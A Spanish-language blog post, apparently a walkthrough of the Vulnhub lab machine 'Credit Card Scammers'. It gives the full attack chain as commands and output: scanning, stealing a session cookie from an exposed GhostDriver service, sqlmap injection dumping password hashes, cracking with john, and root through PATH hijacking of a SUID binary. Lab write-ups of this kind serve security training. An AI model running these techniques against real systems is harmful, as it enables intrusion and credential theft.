LaCashita!

[VLN] Credit Card Scammers

Hoy vamos a hackear la maquina de Vulnhub llamada Credit Card Scammers. Podeis descargarla desde el siguiente enlace: Credit Card Scammers

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


sml@Cassandra:~$ nmap -A -p- 192.168.1.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 12:54 CEST
Nmap scan report for ppeshop.home (192.168.1.52)
Host is up (0.0012s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 8d:0a:3a:42:5f:92:47:69:33:59:b3:77:53:3c:be:73 (RSA)
|   256 ab:3d:26:3b:d9:02:50:a4:49:c0:bf:13:75:dc:a5:73 (ECDSA)
|_  256 fb:6a:7e:1b:05:f9:d1:ef:be:dd:ff:39:ed:f5:f5:63 (ED25519)
80/tcp   open   http       Apache httpd 2.4.37 ((centos))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Your PPE Supplier
443/tcp  closed https
9090/tcp closed zeus-admin

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 197.03 seconds

Miramos si el puerto 80 tiene algo mas interesante para mostrarnos...


sml@Cassandra:~$ gobuster dir -u http://192.168.1.52 -w 
/usr/share/wordlists/dirb/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.52
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/05/13 13:04:14 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.txt (Status: 403)
/LICENSE (Status: 200)
/_admin (Status: 301)
/buynow.php (Status: 200)
/cgi-bin/ (Status: 403)
/class (Status: 301)
/css (Status: 301)
/img (Status: 301)
/noindex (Status: 301)
/settings (Status: 301)
/vendor (Status: 301)
===============================================================
2020/05/13 13:04:24 Finished
===============================================================

Vemos que tiene el directorio /_admin, al cual si entramos en http://192.168.1.52/_admin/dist nos lleva a una pantalla de login.... Por otro lado, buscamos mas informacion en el puerto 443.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.52:443 -w 
/usr/share/wordlists/dirb/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.52
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/05/13 13:04:14 Starting gobuster
===============================================================
/sessions (Status: 200)
/shutdown (Status: 200)

===============================================================
2020/05/13 13:04:24 Finished
===============================================================

Vemos que hay un directorio llamado /sessions. Si entramos, podemos ver que es algo relacionado con phantomjs y ghostdriver.... Buscando mas informacion encontramos los comandos integrados en ghostdriver: https://docs.google.com/spreadsheets/d/17PKHWWhOgEFB8Vznju_bB6p9duguo-2NqL9qBgUQ iYE/edit#gid=0

Exploitation

Despues de ver los comandos accedemos a: http://192.168.1.52:443/sessions Podemos ver la sesion-id, la copiamos y vamos a: http://192.168.1.52:443/session/022189e0-95f5-11ea-b7bf-5d93144ae786/cookie Copiamos el "value". Vamos a http://192.168.1.52/_admin/dist/ y con el cookie manager ponemos el "value" que hemos copiado anteriormente, de ese modo al recargar la pagina ya estamos logueados... Vamos a "Database Admin -> Execute" y capturamos la request con Burp Suite. La guardamos como un fichero (hackme.txt). Ejecutamos sqlmap y vemos que el comando command es vulnerable. Miramos las BBDD que hay.


sml@Cassandra:~$ sqlmap -r h --dbs
[18:20:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:06] [INFO] fetching database names
[18:20:06] [INFO] fetching number of databases
[18:20:06] [INFO] resumed: 2
[18:20:06] [INFO] resumed: information_schema
[18:20:06] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders

Miramos las tablas.


sml@Cassandra:~$ sqlmap -r hackme.txt --dbs -D orders --tables
[18:20:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:10] [INFO] fetching database names
[18:20:10] [INFO] fetching number of databases
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: information_schema
[18:20:10] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders
[18:20:10] [INFO] fetching tables for database: 'orders'
[18:20:10] [INFO] fetching number of tables for database 'orders'
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: orders
[18:20:10] [INFO] resumed: users
Database: orders
[2 tables]
+--------+
| orders |
| users  |
+--------+

Por ultimo, hacemos un dump de la tabla "users".


sml@Cassandra:~$ sqlmap -r hackme.txt --dump -D orders -T users
Database: orders
Table: users
[2 entries]
+--------+--------------+-------------------------------------------------------
-------+
| userID | userName     | password                                              
       |
+--------+--------------+-------------------------------------------------------
-------+
| 1      | admin        | 
$2y$1X$A4jqwtWB73.TAMIeplx0T.5oG/mnHR1qTDa8cmtTIvW3ZTjdSjdjC |
| 2      | m0n3y6r4bb3r | 
$2y$12$EX/FDsztTMwftzPRyY8gFuM7ZjAphQRZs88qpZpmboRogOAOYXowC |
+--------+--------------+-------------------------------------------------------
-------+

Copiamos el password del usuario m0n3y6r4bb3r a un fichero y lo crackeamos usando john y el diccionario rockyou.txt.


sml@Cassandra:~$ nano tocrack.txt
sml@Cassandra:~$ sudo /usr/sbin/john tocrack.txt 
--wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delta1           (?)
1g 0:00:07:12 DONE (2020-05-17 19:07) 0.002313g/s 44.64p/s 44.64c/s 44.64C/s 
greta..blakey
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Obtenemos la password. Nos logueamos con moneygrabber, es decir m0n3y6r4bb3r pero sustituyendo los numeros por letras.

Low Shell


sml@Cassandra:~$ ssh moneygrabber@192.168.1.52
MONEY MAKER.

PLEASE LOGIN.
moneygrabber@192.168.1.52's password: 
Last login: Thu May 14 21:43:28 2020 from 192.168.1.148
[moneygrabber@ppeshop ~]$

Exploramos el sistema y miramos si hay algo interesante.


[moneygrabber@ppeshop ~]$ find / -perm -4000 2>/dev/null
--SNIP--
/usr/bin/backup
--SNIP--

Vemos que esta el fichero /usr/bin/backup con SUID. Al ejecutarlo, ejecuta tar/mysql.tar, asi que creamos un enlace simbolico de bash con los nombres tar y mysql.tar, exportamos el PATH para que apunte a nuestros enlaces y ejecutamos :)

Privilege Escalation


[moneygrabber@ppeshop ~]$ mkdir bin
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/tar
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql.tar
[moneygrabber@ppeshop ~]$ export PATH=/home/moneygrabber/bin:$PATH
[moneygrabber@ppeshop ~]$ /usr/bin/backup
[root@ppeshop bin]# id
uid=0(root) gid=1000(moneygrabber) groups=1000(moneygrabber)
[root@ppeshop bin]# cd /root
[root@ppeshop root]# ls
anaconda-ks.cfg  flag3.txt  ghostdriver.log
[root@ppeshop root]# cat flag3.txt 
y2zmGeGjrA4dbDj4wBWr

End

Y con esto ya seriamos root de la maquina :)